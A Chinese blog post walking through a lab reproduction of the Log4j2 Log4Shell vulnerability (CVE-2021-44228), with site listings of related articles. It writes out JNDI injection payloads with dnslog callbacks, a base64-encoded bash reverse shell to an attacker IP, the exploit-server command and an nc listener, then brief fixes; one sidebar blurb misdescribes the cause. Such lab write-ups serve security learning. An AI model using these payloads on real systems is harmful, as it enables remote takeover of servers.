Log4j2漏洞复现(CVE-2021-44228)

已于 2024-05-11 10:26:17 修改
阅读量537 收藏 8
点赞数 10
分类专栏: 漏洞复现 文章标签: log4j web安全
于 2024-05-11 10:15:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40860153/article/details/138700209
版权

文章目录

概要

Log4j2是apache下的java应用常见的开源日志库,是一个Java的日志记录工具。在log4j框架的基础上进行了改进,并引入了丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。

过程

1、当用户通过get或者post提交输入信息时,应用程序中的“log4j2”组件会将信息记录到日志中;

2、假如日志中含有该语句${jndi:ldap://192.168.96.1:1099/shell},log4j2就会去解析该信息,通过jndi的lookup去解析该url:
ldap://192.168.96.1:1099/shell

3、解析到ldap,就会去192.168.96.1:1099的ldap服务找名为shell的资源,找到shell之后,就会将资源信息返回给应用程序的log4j组件,而log4j组件就会将资源下载下来,然后发现shell是一个.class文件,就会去执行里面的代码,从而实现注入。

4、攻击者可以通过shell实现任意的命令执行,造成严重危害。

在这里插入图片描述

影响版本

2.0 < log4j2 <2.14.1

漏洞复现

实验环境:本地vulfocus靶场-CVE-2021-44228

1、启动容器,访问靶机页面,点击超链接获取请求
在这里插入图片描述

2、开启dnslog网站申请一个dns域名,用来测试漏洞是否支持域名解析以及后面的代码运行。

访问 http://www.dnslog.cn  ->  点击get subdomain -> 获取随机子域名 xxx.dnslog.cn

3、验证漏洞
使用burpsuite获取请求包并修改请求包中的参数内容为下面的payload后再发送:

1、payload= ${jndi:ldap://kf.nej6ew.dnslog.cn}
2、对payload的值进行URL编码

在这里插入图片描述
观察dns网站解析日志结果,刷新,发现解析成功,说明漏洞存在。
在这里插入图片描述
也可以将payload替换成以下形式验证:

${jndi:ldap://${sys:java.version}.nej6ew.dnslog.cn}

在这里插入图片描述
在这里插入图片描述
4、通过JNDI注入反弹shell

JNDI注入语句格式:
${jndi:rmi://+存在恶意文件的JNDI服务器地址}
${jndi:ldap://+存在恶意文件的JNDI服务器地址}
例如:
payload=${jndi:ldap://kf.wfyebc.dnslog.cn}
payload=${jndi:ldap://${sys:java.version}.wfyebc.dnslog.cn}
payload=${jndi:rmi://192.168.66.128:1099/4j8rkj}

构造反弹命令(通过命令将靶机的最高控制权限移交给攻击机):

1、原始shell反弹命令:bash -i >& /dev/tcp/192.168.0.1/6666 0>&1  #这个代码是靶机运行,ip是攻击机IP
2、通过编码改成可在java环境下执行的命令:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}
3、最后利用exp工具搭建JNDI服务器并挂载恶意命令执行:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS82NjY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.0.129"

#-C是执行的bash命令,-A是JNDI服务器IP

生成rmi远程代码执行地址:

rmi://192.168.0.129:1099/fpzqep

JNDI注入语句:

${jndi:rmi://192.168.0.129:1099/fpzqep}

攻击机开启端口监听:

nc -lnvp 6666

将JDNI注入语句通过burpsuite 转码后发送,即可将shell反弹。

payload=${jndi:rmi://192.168.0.129:1099/fpzqep}

在这里插入图片描述

修复建议

1.禁止用户输入的参数中出现攻击关键字(过滤用户输入)
2.设置系统环境变量:FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS=true
3.升级到官方最新版本:https://logging.apache.org/log4j/2.x/download.html

HelloYo_k
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 527
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
然而,2021 年底,Log4j 发现了一个严重的安全漏洞,被称为 CVE-2021-44228(也称为 Log4Shell),这使得攻击者可以通过在日志记录中注入恶意代码来远程执行任意代码,从而对受影响的系统造成严重威胁。 此漏洞源于...
log4j2远程代码执行漏洞原理与漏洞复现
人若无名,便可专心练剑
03-20 1768
在看我写的log4j2远程代码执行漏洞之前,师傅们可以看看我前面写的《JNDI注入原理及利用IDEA漏洞复现》这篇文章,因为log4j2远程代码执行漏洞里面有讲JNDI注入,这样可以对师傅的理解更加深刻也更加容易理解!
一次Log4j2漏洞复现过程
weixin_60830484的博客
04-17 387
本次将复现著名的Log4j2远程代码执行漏洞(CVE-2021-44228)
Log4j2 远程代码执行漏洞CVE-2021-44228
最新发布
qq_68163788的博客
06-18 1264
Apache Log4j2是一个基于Java的日志记录工具,当前被广泛应用于业务系统开发,开发者可以利用该工具将程序的输入输出信息进行日志记录。CVE-2021-44228Log4j2中存在的一个严重的远程代码执行漏洞。攻击者可以通过恶意构造的日志信息,利用该漏洞执行恶意代码,从而危害受影响的系统。这个漏洞对于使用Log4j2的应用程序和系统构成了潜在的安全风险。
Apache Log4j2 漏洞修复及复现
JavaPub
12-11 8400
文末漏洞细节 文章目录前言修复建议漏洞细节 前言 这几天 Apache Log4j2 远程代码执行漏洞刷屏了整个互联网行业,公司也发生了这个问题,做出了紧急修复。 介绍 相信每一个技术人都有听过这款日志框架的大名。Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 https://github.com/apache/lo
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 8163
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2漏洞修复
liuyuinsdu的专栏
12-12 3289
一、【紧急补救措施】 (1)修改jvm参数-Dlog4j2.formatMsgNoLookups=true (2)修改配置log4j2.formatMsgNoLookups=True (3)将系统环境变量FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true 首先修改supervisor的配置文件 增加环境变量 遍历一下日志文件,看看是否有攻击 没有人攻击,很好 二、修改依赖库 【影响范围】:Java类产品:...
Log4j2漏洞修复
running_pork的博客
12-16 3172
文章目录一、漏洞二、修复漏洞2.1 SpringMVC项目修复2.2 SpringBoot项目修复三、如何攻击漏洞 一、漏洞 近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。 Apache Log4j2 是一款优秀的 Java 日志框架。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
冰河连夜复现Log4j最新史诗级重大漏洞,含视频和完整案例代码,全网最全,赶快收藏吧
冰河的专栏
05-30 3909
周末与一些小伙伴交流的过程当中,发现一些小伙伴公司的项目中使用的Log4j版本还是2.14.0,我一听就有点震惊了:你们还在使用Log4j的2.14.0版本,这个版本存在重大漏洞啊!但是有些小伙伴看起来对Log4j中存在的重大漏洞不以为意。“我们项目中使用的Log4j一直是2.14.0这个版本啊,一直没啥问题啊!”。哎,看来有些小伙伴对Log4j2.14.0版本存在的漏洞还是不太了解呀,于是我连夜录制了复现Log4j最新重大漏洞的视频,发布到了B站。
Log4j2高危漏洞修复
猎隼
12-11 2071
Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。 具体复现细节可以到GitHub上搜索 log4j/exp 或者log4j/poc 即可找到相关程序。 (1)影响范围 Apache Log4j <= 2.14.x (除1.x) (2)查找jar linux sudo find / -name "*log4j-*.jar" Windows 计算机 搜索 *log4j*.jar java项目依赖包搜索log4j,这里使用idea举例,展开
紧急!Log4j 史诗级漏洞来袭,已引起大规模入侵,速速自查!
程序猿DD
12-10 715
1、漏洞简介Apache Log4j 2是一款优秀的Java日志框架。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。由于Apac...
log4j2漏洞修复指南
Django的博客
12-13 2908
背景 漏洞名称: Apache Log4j 远程代码执行漏洞 漏洞等级: 严重 漏洞描述: Apache Log4j2是一款优秀且应用非常广泛的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Fli
Log4j2漏洞信息最新跟进
Mr.Wang的博客
12-20 2079
log4j漏洞发布
apache log4j2 任意代码执行漏洞(cve-2021-44228)
09-18
Apache Log4j2是一个广泛使用的开源日志管理工具。然而,最近发现了一个严重的漏洞,被命名为CVE-2021-44228。这个漏洞允许攻击者通过恶意构造的日志事件来执行任意代码,导致系统被远程攻击者完全控制。 漏洞是由于Log4j2中的PatternLayout布局处理器存在一个特定的模式转换字符(%d、%i、%m、%p等)被恶意利用的问题。攻击者可以将恶意代码嵌入到日志事件中,并通过向受影响的Log4j2实例发送恶意请求触发此漏洞。一旦攻击成功,攻击者可以在受影响的应用程序上执行任意的远程代码。 这个漏洞的危害性非常高,因为日志功能几乎在每个应用程序中都得到广泛使用。攻击者可以通过恶意日志事件执行各种攻击,包括远程命令执行、数据库注入、代码执行等。受影响的应用程序可能会泄露敏感数据、遭受损坏甚至被完全控制。 解决这个漏洞的最佳方法是升级到Log4j2的最新版本。Apache已经发布了修复此漏洞的版本,更具体地说是2.15.0和2.16.0,这些版本不再处理这类模式转换字符。如果无法立即更新,可以考虑在应用程序中禁用PatternLayout布局处理器,或者使用其他日志管理框架替代Log4j2。 此外,还建议及时监测应用程序的日志活动,并对异常的日志事件进行审查。如果遇到可疑的日志事件,应立即采取行动,例如暂停相关服务、排查日志事件来源、加强网络安全防护等。 总之,Apache Log4j2CVE-2021-44228漏洞是一个严重的安全威胁,可能导致系统被完全控制。及时升级到修复版本、加强监控和审查日志活动是应对该漏洞的关键步骤。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值